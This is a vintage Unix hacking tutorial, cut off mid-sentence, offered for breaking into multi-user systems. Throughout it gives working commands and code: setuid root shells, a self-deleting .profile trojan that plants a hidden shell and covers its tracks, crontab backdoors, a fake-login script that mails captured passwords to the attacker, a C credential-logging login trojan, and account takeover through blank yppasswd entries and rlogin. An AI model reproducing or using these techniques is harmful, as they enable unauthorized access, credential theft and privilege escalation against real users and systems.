unix- a hacking tutorial.sir

黑客培训教程

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID.  UID-shells only set the effective
userid, not the real user-id.  But, the effective user id over-rides the
real user id.  Now, you can, if you wanted to just be annoying, make
the utilities suid to root.  What do I mean?  For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap

Ls would then be able to pry into ANY directory.  If you did the same to
"cat" you could view any file.  If you did it to rm, you could delete any
file.  If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).


How do I get root?
------------------

   Good question indeed.  To make a program set the user-id shell to root,
you have to be root, unless you're lucky.  What do I mean?  Well, say
you find a program that sets the user-id to root.  If you have access
to write to that file, guess what?  you can copy over it, but keep
the uid bit set.  So, say you see that the program chsh is setting
the user id too root.  You can copy /bin/sh over it.

$ ls -l
rwsrwsrws  root     other  10999 Jan 4  chsh
$ cp /bin/sh chsh
$ chsh
#

See?  That is just one way.  There are others, which I will now talk
about.

More on setting the UID
-----------------------

        Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file.  Now, only those who own the file
can set the user ID bit.  Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file.  This brings
me to BAD file permissions.



II. HACKING : Bad Directory Permissions

        Now, what do I mean for bad directory permissions?  Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it.  Now, this comes
in handy when wanting to steal someone's access.  If you can write to
a user's .profile, you are in business.  You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

  Now, when the user next logs on, the .profile will create .runme which
  will set your ID to the user whose .profile you changed.  Ideally, you'll
  go back in and zap those lines after the suid is created, and you'll create
  a suid somewhere else, and delete the one in his dir.  The .runme will
  not appear in the user's REGULAR directory list, it will only show up
  if he does "ls -a" (or ls with a -a combination), because, the '.' makes
  a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix.  The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *


   The BEST thing that could happen is to find a user's directory writeable
   by you.  Why?  well, you could replace all the files in the directory
   with your own devious scripts, or C trojans.  Even if a file is not
   writeable by you, you can still overwrite it by deleteing it.  If you
   can read various files, such as the user's .profile, you can make a
   self deleting trojan as so:

 $ cp .profile temp.pro
 $ ed .profile
 1234
 ? a
 cp /bin/sh .runme
 chmod a+x .runme
 chmod a+s .runme
 mv temp.pro .profile
 (control-d)
 ? w
 [another number]
 ? q
 $ chown that_user temp.pro

  What happens is that you make a copy of the .profile before you change it.
  Then, you change the original.  When he runs it, the steps are made, then
  the original version is placed over the current, so if the idiot looks in
  his .profile, he won't see anything out of the ordinary, except that he
  could notice in a long listing that the change date is very recent, but
  most users are not paranoid enough to do extensive checks on their files,
  except sysadm files (such as passwd).

  Now, remember, even though you can write to a dir, you may not be able
  to write to a file without deleting it.  If you do not have write perms
  for that file, you'll have to delete it and write something in its place
  (put a file with the same name there). The most important thing to remember
  if you have to delete a .profile is to CHANGE the OWNER back after you
  construct a new one (hehe) for that user.  He could easily notice that his
  .profile was changed and he'll know who did it.  YES, you can change the
  owner to someone else besides yourself and the original owner (as to throw
  him off), but this is not wise as keeping access usually relies on the fact
  that they don't know you are around.

  You can easily change cron files if you can write to them.  I'm not going
  to go into detail about cronfile formats here, just find the crontab files
  and modify them to create a shell somewhere as root every once in a while,
  and set the user-id.

III. Trojan Horses on Detached terminals.
        Basically this:  You can send garbage to a user's screen and
        mess him up bad enough to force a logoff, creating a detached
        account.  Then you can execute a trojan horse off that terminal in
        place of login or something, so the next one who calls can hit the
        trojan horse.  This USUALLY takes the form of a fake login and
        write the username/pw entererred to disk.

        Now, there are other trojan horses available for you to write.  Now,
        don't go thinking about a virus, for they don't work unless ROOT runs
        them.  Anyway, a common trjan would be a shell script to get the
        password, and mail it to you.  Now, you can replace the code for
        the self deleting trojan with one saying something like:
        echo "login: \c"
        read lgin
        echo off (works on some systems)
        (if above not available...: stty -noecho)
        echo "Password:\c"
        read pw
        echo on
        echo "Login: $lgin - Pword: $pw" | mail you

        Now, the best way to use this is to put it in a seperate script file
        so it can be deleted as part of the self deleting trojan.  A quick
        modification, removing the "login: " and leaving the password
        may have it look like SU, so you can get the root password.  But
        make sure the program deletes itself.  Here is a sample trojan
        login in C:

        #include <stdio.h>
        /* Get the necessary defs.. */
        main()
        {
          char *name[80];
          char *pw[20];
          FILE *strm;
          printf("login: ");
          gets(name);
          pw = getpass("Password:");
          strm = fopen("/WhereEver/Whateverfile","a");
          fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
          fclose(strm);
          /* put some kind of error below... or something... */
          printf("Bus Error - Core Dumped\n");
          exit(1);
          }

        The program gets the login, and the password, and appends it to
        a file (/wherever/whateverfile), and creates the file if it can,
        and if its not there.  That is just an example.  Network Annoyances
        come later.

 IV.  Odd systems

        There may be systems you can log in to with  no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..).  Don't give up here.  Some systems will
let you login as root, but give you a menu which will allow you to add an
account.  However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell.  You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting.  HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100.  The "editing" usually only involves changing the password
on the account.  If an account has a * for a password, the standard passwd
program which changes programs, will say no pw exists, and will ask you to
enter one. (wallah! You have just freed an account for yourself.  Usually
bin and sys have a * for a password).  If one exists you'll have to enter
the old Password (I hope you know it!) for that account.  Then, you are
in the same boat as before. (BTW -- These wierd systems are usually
Xenix/386, Xenix/286, or Altos/286)
        With word processors, usually you can select the load command,
and when the word processor prompts for a file, you can select the passwd
file, to look for open accounts, or at least valid ones to hack.  An example
would be the informix system.  You can get a word processor with that such
as Samna word, or something, and those Lamers will not protect against
shit like that.  Why?  The Passwd file HAS to be readable by all for the most
part, so each program can "stat" you.  However, word processors could be made
to restrict editing to a directory, or set of directories.  Here is an
example:

        $ id
        uid=100(sirhack) gid=100(users)
        $ sword
        (word processor comes up)
        (select LOAD A FILE)
        <Edit File>: /etc/passwd
        <Loading..>
        (you see: )
        root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
        sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
        datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
        ...

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

        You can usually tell when you'll get a menu.  Sometimes on UNIX
        SYSTEM V, when it says TERM = (termtype), and is waiting for
        you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
        Not much to say about this.  all it is, is when every password field
        in the password file has an "x" or just a single character.  What
        that does is screw you, becuase you cannot read the shadowed password
        file, only root can, and it contains all the passwords, so you will
        not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
the interrupt handler doesn't catch, and things like that.  However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything.  Now I will Talk about Internet.



--->>> InterNet <<<---
        Why do I want to talk about InterNet?  Well, because it is a prime
example of a TCP/IP network, better known as a WAN (Wide-Area-Network).
Now, mainly you will find BSD systems off of the Internet, or SunOS, for
they are the most common.  They may not be when System V, Rel 4.0, Version
2.0 comes out.  Anyway,  these BSDs/SunOSs like to make it easy to jump
from one computer to another once you are logged in.  What happens is
EACH system has a "yello page password file". Better known as yppasswd.
If you look in there, and see blank passwords you can use rsh, rlogin, etc..
to slip into that system.  One system in particular I came across had a
a yppasswd file where *300* users had blank passwords in the Yellow Pages.
Once I got in on the "test" account, ALL I had to do was select who I wanted
to be, and do: rlogin -l user (sometimes -n).  Then it would log me onto
the system I was already on, through TCP/IP.  However, when you do this,
remember that the yppasswd only pertains to the system you are on at
the time.  To find accounts, you could find the yppasswd file and do:

% cat yppasswd | grep ::

Or, if you can't find yppasswd..

% ypcat passwd | grep ::

On ONE system (which will remain confidential), I found the DAEMON account
left open in the yppasswd file.  Not bad.  Anyway,  through one system
on the internet, you can reach many.  Just use rsh, or rlogin, and look
in the file: /etc/hosts for valid sites which you can reach.  If you get
on to a system, and rlogin to somewhere else, and it asks for a password,
that just means one of two things:

A. Your account that you have hacked on the one computer is on the target
   computer as well.  Try to use the same password (if any) you found the
   hacked account to have.  If it is a default, then it is definitly on the
   other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it
   was like typing in your login at a "login: " prompt.  You may not exist on
   the other machine.  Try "rlogin -l login_name", or rlogin -n name..
   sometimes, you can execute "rwho" on another machine, and get a valid
   account.

Some notes on Internet servers.  There are "GATEWAYS" that you can get into
that will allow access to MANY internet sites.  They are mostly run off
a modified GL/1 or GS/1.  No big deal.  They have help files.  However,
you can get a "privilged" access on them, which will give you CONTROL of
the gateway.. You can shu